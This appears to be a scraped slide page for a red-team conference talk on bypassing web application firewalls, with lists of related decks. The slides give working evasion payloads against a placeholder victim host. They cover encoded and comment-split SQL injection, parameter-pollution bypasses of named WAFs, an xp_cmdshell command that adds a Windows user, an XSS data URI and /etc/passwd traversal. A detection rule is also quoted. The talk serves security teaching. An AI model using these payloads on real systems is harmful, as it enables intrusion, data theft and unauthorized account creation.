Owasp Top 10 - Owasp Pune Chapter - January 2008
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 

Plus de Prathan Phongthiproek

The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationPrathan Phongthiproek
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationPrathan Phongthiproek
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! Prathan Phongthiproek
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksPrathan Phongthiproek
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Prathan Phongthiproek
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingPrathan Phongthiproek
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Prathan Phongthiproek
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopPrathan Phongthiproek
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetPrathan Phongthiproek
 
Tisa-Social Network and Mobile Security
Tisa-Social Network and Mobile SecurityTisa-Social Network and Mobile Security
Tisa-Social Network and Mobile SecurityPrathan Phongthiproek
 

Plus de Prathan Phongthiproek (20)

Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
 
The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team Operation
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
 
Mobile App Hacking In A Nutshell
Mobile App Hacking In A NutshellMobile App Hacking In A Nutshell
Mobile App Hacking In A Nutshell
 
Jump-Start The MASVS
Jump-Start The MASVSJump-Start The MASVS
Jump-Start The MASVS
 
OWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-DiveOWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-Dive
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
 
Understanding ransomware
Understanding ransomwareUnderstanding ransomware
Understanding ransomware
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure!
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application Attacks
 
Owasp Top 10 Mobile Risks
Owasp Top 10 Mobile RisksOwasp Top 10 Mobile Risks
Owasp Top 10 Mobile Risks
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration Testing
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest Workshop
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load Target
 
Tisa mobile forensic
Tisa mobile forensicTisa mobile forensic
Tisa mobile forensic
 
Tisa-Social Network and Mobile Security
Tisa-Social Network and Mobile SecurityTisa-Social Network and Mobile Security
Tisa-Social Network and Mobile Security
 
Tisa social and mobile security
Tisa social and mobile securityTisa social and mobile security
Tisa social and mobile security
 

Introduction to Web Application Firewall (WAF

  • 1. Web Application Firewall (WAF) Suckseed or Succeed !? Mr.Prathan Phongthiproek Consulting Manager, Red Team ACIS Professional Center
  • 2. Who am I ? ACIS Professional Center Manager of the Red Team Specializing in Attack & Penetration Information Security Consulting Manager Instructor and Speaker Founder of CWH Underground Hacker Aka 0x7a657133756c
  • 3. Let’s Reveal Introduction to Web Application Firewall (WAF) Breach it !! Filter Evasion HTTP Parameter Contamination HTTP Pollution: Split and Join Conclusion
  • 5. Web Application Hacking 7 of 10 sites are vulnerable 70% of Cyber attacks are on web ports 95% of companies are hacked through web ports Anonymous and Lulzsec Hacker with Operation #AntiSec
  • 6. Web Application Hacking Top 3 Web App Attacks Cross Site Scripting File Inclusion (Remote/Local) SQL Injection (Normal/Blind/Time based/Regex...)
  • 7. Misunderstand for Harden Web Application
  • 8. What’s WAF ? Emerged from IDS/IPS focused on HTTP protocol and HTTP related attacks Usually contain a lot of complex reg-exp rules to match (Blacklist) For most WAF vendors they are “Closely guarded secrets” Open-source WAFs (Mod_security and PHPIDS) have open source rules
  • 10. Detection and Protection SQL Injection Cross Site Scripting Local and Remote File Inclusion Code/Command Injection Directory Traversal Buffer Overflow Cookie Poisoning Parameter Tampering Upload File Mis-Handling Information Disclosure Etc...
  • 11. WAFs Vendors Armorize Bee-ware Barracuda BinarySec Cisco ACE Mod Security Citrix Netscaler WebKnight F5 DenyAll Imperva SecureSphere Fortify Radware Appwall Visonys Profense Pentasecurity Other..
  • 13. Breach it !! (CMS and WAFs) “เอาอยู่ เอาอย.......แตกแล้ว” ู่
  • 14. Filter Evasion (SQLi) PHP: Magic_quote On, Mysql_real_escape_string, Addslashes ‘ “ -> ’ ” id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’
  • 15. Filter Evasion (SQLi) PHP: Magic_quote On, Mysql_real_escape_string, Addslashes ‘ “ -> ’ ” id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
  • 16. Filter Evasion (SQLi) PHP: Magic_quote On, Mysql_real_escape_string, Addslashes String to ASCII id=1 and 1=2 union select 1,load_file(CHAR (47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102 ,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
  • 17. Filter Evasion (SQLi) Comments //,--,/**/,/*,#,%00 id=1+un/**/ion+se/**/lect+1,2,3-- Case Changing (lower case) /unionsselect/g id=1+UnIoN/**/SeLecT/**/1,2,3-- Replaced keywords id=1+UnunionIoN+SeselectLecT+1,2,3--
  • 18. Filter Evasion (SQLi) Case Study: NukeSentinel (PHP Nuke) Encode to Hex Forbidden: http://victim.com/php-nuke/?/**/union/**/select....... Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select....... Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
  • 19. Filter Evasion (SQLi) Buffer Overflow (For C language) id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT +1,version(),3,database(),user(),6,7,8,9,10--
  • 20. Filter Evasion (SQLi) Inline Comments (/*!......*/) A lot of WAFs was bypassed Bypass IPS and Timeout MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/ comments.html) /unionsselect/ig id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/) +FrOm/*!information_schema*/.tables/*!WhErE*/+/*! TaBlE_sChEMa*/+like+database()--
  • 21. Filter Evasion (SQLi) Inline Comments (/*!......*/)
  • 23. Filter Evasion (SQLi) Other Bypasses: and -> && or -> || = -> like substring() -> substr(), mid(), strcmp() ascii() -> hex(), bin(), char(), ord() benchmark() -> sleep() Whitespace -> (),/**/,%0b isnull, between
  • 24. Filter Evasion (SQLi) Case Study: PHPIDS
  • 25. Filter Evasion (SQLi) Case Study: PHPIDS
  • 26. Filter Evasion (SQLi) Case Study: PHPIDS
  • 27. Filter Evasion (SQLi) Case Study: Mod Security CRS SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "bunionb.{1,100}?bselectb" "phase2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase ,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/ WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/ 6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.sql_injection_score=+% {tx.critical_anomaly_score},setvar:tx.anomaly_score=+% {tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-% {matched_var_name}=%{tx.0}"
  • 28. Filter Evasion (SQLi) Case Study: Mod Security CRS http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect %23foo%0D%0A1%2C2%2Ccurrent_user 0 div 1 union#foo*/*bar select#foo 1,2,current_user 0 div 1 union select 1,2,current_user
  • 29. Filter Evasion Cross Site Scripting (XSS) Forbidden: http://victim.com/search.php?q=javascript:alert('XSS') Bypass: http://victim.com/search.php?q=data:text/ html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4= File Inclusion Forbidden: http://victim.com/download.php?file=../../../etc/passwd Bypass: http://victim.com/download.php?file=../../../etc/passwd.......... Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../ passwd
  • 31. HTTP Parameter Contamination Bypass Mod_Security SQLi rule (modsecurity_crs_41) Bypass URLScan 3.1 DenyQueryStringSequences rules Bypass AQTRONIX Webknight WAF with “%”
  • 32. HTTP Parameter Contamination Case Study: AQTRONIX Webknight http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables) 10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables) 10 and 1=0/(select top 1 table_name from information_schema.tables)
  • 33. HTTP Pollution: Split and Join HPP is a quite simple but effective hacking technique HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string Focus on ASP/ASP.net A lot of WAF was bypassed
  • 37. HTTP Pollution: Split and Join Basic Attack Forbidden:http://victim.com/search.aspx?q=select name,password from user Bypass:http://victim.com/search.aspx?q=select name&q=password from user q=select name q=password from user q=select name,password from user
  • 38. HTTP Pollution: Split and Join HPP+Inline Comment (Bypass Commercial WAF) Forbidden:http://victim.com/search.aspx?q=select name,password from user Bypass:http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/ from/*&q=*/user q=select/* q=*/name q=password/* q=*/from/* q=*/user q=select/*,*/name,password/*,*/from/*,*/user q=select name,password from user
  • 40. HTTP Pollution: Split and Join Case study: IBM Web Application Firewall (2011-6-21) Forbidden:http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” -- Bypass:http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ -- id=1’; /* id=1*/ EXEC /* id=1*/ master..xp_cmdshell /* id=1*/ “net user lucifer UrWaFisShiT” /* id=1*/ -- id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ -- id=1’; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --
  • 41. “ประเทศไทยต้องการ ความเปลี่ยนแปลง ถึงเวลาที่ทุกคนใน ประเทศตื่นตัวได้แล้ว ความโง่เขลาจักต้องหมดสิ้นไป”
  • 42. How to protect your website ? Implement Secure Software Development Life Cycle (SSDLC) Secure Coding: Validate all inputs and outputs Pentest before Online Harden it !! Re-visit Again Deploy WAF (Optional)
  • 43. Conclusion WAF is not the long-expected It’s functional limitations, WAF is not able to protect a web app from all possible vulnerabilities It’s necessary to adapt WAF filter to the particular web app being protected WAF doesn’t eliminate a vulnerability, It just partly screens the attack vector It suckseed or succeed !? “Security Products not able to 100% protect from damn config/coding of admin. Just need a time and imagination for breach it !!”
  • 44. Greetz To.. ACIS-Red Team Kyle Johannes Dahse Ahmad Maulana Luca Carettoni Stefano di Paola Ivan Markovic All WAF products that I breached